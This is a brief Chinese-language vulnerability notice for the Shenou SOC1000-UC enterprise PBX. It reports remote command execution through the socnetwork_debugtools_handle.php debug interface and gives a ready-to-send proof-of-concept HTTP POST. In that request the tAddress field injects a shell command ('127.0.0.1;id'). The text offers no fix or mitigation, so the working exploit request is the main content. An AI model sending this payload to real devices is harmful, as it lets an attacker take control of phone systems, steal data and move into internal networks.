漏洞描述
申瓯通信 SOC1000-UC PBX设备是一款用于企业通信的电话交换设备,支持多种通信协议和功能。SOC1000-UC设备的 socnetwork_debugtools_handle 接口存在远程命令执行漏洞,攻击者可以通过构造特定的请求在目标设备上执行任意命令,从而控制设备、窃取敏感信息或进一步攻击内网。
申瓯通信 SOC1000-UC PBX设备 /admin/modules/socnetwork/views/socnetwork_debugtools_handle.php 命令执行漏洞
PoC代码
POST /admin/modules/socnetwork/views/socnetwork_debugtools_handle.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
tAddress=127.0.0.1;id&tCount=